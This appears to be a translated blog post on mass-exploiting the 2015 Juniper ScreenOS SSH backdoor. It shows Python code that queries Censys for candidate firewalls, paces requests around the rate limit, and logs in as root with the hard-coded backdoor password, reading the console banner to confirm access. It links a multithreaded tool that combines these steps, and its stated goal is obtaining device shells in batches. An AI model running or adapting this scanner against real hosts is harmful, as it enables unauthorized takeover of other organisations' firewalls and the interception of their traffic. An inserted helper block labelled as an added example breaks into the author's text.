Obtain Juniper Netscreen webshells in batches using Censys
Censys is a new search engine for information about networked devices. Security experts can use it to evaluate the exposure of their own systems, while attackers can use it as a powerful tool for locating targets and collecting information about them in the reconnaissance stage. Its functionality is very similar to the popular Shodan, but its advantage over Shodan is that it is free; it was initially released in October by University of Michigan researchers and is currently supported by Google. For more information about Censys, see http://www.freebuf.com/news/89285.html
Bob Worrall, Senior Vice President and Chief Information Security Officer of Juniper, said that two vulnerabilities were discovered during a recent internal code audit, affecting ScreenOS 6.2.0r15 through 6.2.0r18 and 6.3.0r12 through 6.3.0r20. One is unauthorized code that allows VPN traffic to be decrypted; the other allows attackers to remotely administer the device through SSH or telnet. Juniper noted that access to these systems will be logged as a successful password authentication, but that attackers can then change or delete the log entries. For more information about the vulnerability, see http://www.freebuf.com/news/90323.html
After learning about this vulnerability, I tried to use Censys to search for hosts that may have the backdoor and to verify them in batches. Before getting to that, let me first give a general idea of how to use the Censys API.
First, you need an account. Censys registration is free, so this should be simple. After registering, we can see on the account page that Censys assigns an API ID and a Secret to each user. We also note that there is a rate limit listed below them: through the API you can only make 120 requests every five minutes. We will come back to this limit later.
Opening the API page, we can see that Censys provides six API endpoints: search, view, report, query, export, and data.
Among these, search is the one we will use most, so I will give a general introduction to it. The request URL for the search endpoint is https://www.censys.io/api/v1/search/<index>, where <index> is one of ipv4, websites, or certificates, meaning a search over IPv4 hosts, websites, or certificates respectively. The body of our POST request is a JSON object containing query, page, and fields. query is the search statement itself. page is the page number to return; Censys always returns exactly one page per request, so if you set page to 5 you do not get the first five pages, you get only the fifth page. fields lists the specific fields you want included in each returned record.
With the above in hand, we can use Censys to pull data. For example, to find hosts whose HTTP Server header identifies Apache, the code can be written as follows:
import sys
import json
import requests

API_URL = "https://www.censys.io/api/v1"
UID = "YOUR API ID"          # API ID from the Censys account page
SECRET = "YOUR SECRET"       # Secret from the Censys account page

# One page of results; only the listed fields are returned for each record.
data = {
    "query": "80.http.get.headers.server: apache",
    "page": 1,
    "fields": ["ip", "location.country"]
}

res = requests.post(API_URL + "/search/ipv4", data=json.dumps(data), auth=(UID, SECRET))
results = res.json()

if res.status_code != 200:
    print("error occurred: %s" % results["error"])
    sys.exit(1)

# Field values in the v1 search response are lists, hence the [0].
for result in results["results"]:
    print("%s in %s" % (result["ip"], result["location.country"][0]))
Of course, the code above only returns the first page. To obtain a larger amount of data, you can loop over a page variable. Note that page numbering starts from 1, not from 0. This is where the limit mentioned earlier bites: Censys only allows 120 requests every five minutes, so if we simply loop through the pages as fast as possible we get an error. My solution was to pace the requests: if a request takes less than 2.5 seconds, I sleep for the remaining time; otherwise I go straight on to the next query. You may well have a better solution to this problem.
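The paced, page-by-page walk described above, as an added example that is not the author's code: the transport, clock and sleep are injectable (an assumed interface, not part of Censys) so the 2.5 s pacing and the 1-based pagination can be checked offline; the metadata.pages field is assumed from the v1 response format.

```python
import json
import time

API_URL = "https://www.censys.io/api/v1"
MAX_REQUESTS = 120                 # limit shown on the account page
WINDOW_SECONDS = 300               # per five minutes
MIN_INTERVAL = WINDOW_SECONDS / float(MAX_REQUESTS)   # 2.5 s per request


def requests_post(url, payload, auth):
    """Default transport: a real HTTP call. Returns (status_code, decoded JSON)."""
    import requests
    res = requests.post(url, data=json.dumps(payload), auth=auth)
    return res.status_code, res.json()


class PacedSearch(object):
    """Walk /search/<index> page by page without exceeding 120 requests per 5 minutes.

    post, clock and sleep are injectable (assumed interface, not part of Censys)
    so the pacing logic can be exercised offline.
    """

    def __init__(self, auth, post=requests_post, clock=time.time, sleep=time.sleep):
        self.auth, self.post, self.clock, self.sleep = auth, post, clock, sleep
        self.last_sent = None
        self.delays = []   # how long each enforced wait was, for inspection

    def _pace(self):
        # Sleep only for what is left of the 2.5 s slot; a slow request needs no delay.
        now = self.clock()
        if self.last_sent is not None:
            remaining = MIN_INTERVAL - (now - self.last_sent)
            if remaining > 0:
                self.sleep(remaining)
                self.delays.append(remaining)
                now = self.clock()
        self.last_sent = now

    def search(self, index, query, fields, max_pages=None):
        """Yield result records; Censys pages are 1-based and one page per request."""
        page = 1
        while True:
            self._pace()
            status, data = self.post(API_URL + "/search/" + index,
                                     {"query": query, "page": page, "fields": fields}, self.auth)
            if status != 200:
                raise RuntimeError("Censys error: %s" % data.get("error", status))
            for record in data["results"]:
                yield record
            # metadata.pages is the total page count (assumed from the v1 response format)
            if page >= data["metadata"]["pages"] or (max_pages and page >= max_pages):
                return
            page += 1
```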
With Censys introduced, let's get to the topic. Checking whether a device has the backdoor simply means checking whether the host accepts an SSH login with user = "root" and the password "<% s (un = '% s') = % u". I used pxssh from the pexpect module to log in over SSH. The code is as follows:
from pexpect import pxssh

def connectSSH(host, user, passwd):
    try:
        ssh = pxssh.pxssh()
        # The ScreenOS console does not present a normal shell prompt,
        # so pxssh must not try to reset the prompt after login.
        ssh.login(host, user, passwd, auto_prompt_reset=False)
        return ssh
    except Exception as e:
        print("%s is not vul" % host)
        return None
In fact, because the login does not land in a traditional SSH shell but in the firewall's management console, pxssh does not recognise the login as successful and instead raises a timeout exception. In that case we check whether the session's before buffer contains "Remote Management Console"; if it does, the host has the backdoor.
After putting all of this code together and adding multithreading for speed, we can retrieve candidate hosts from Censys in real time and check each of them. The integrated code is at: https://github.com/s0m30ne/JuniperBackdoor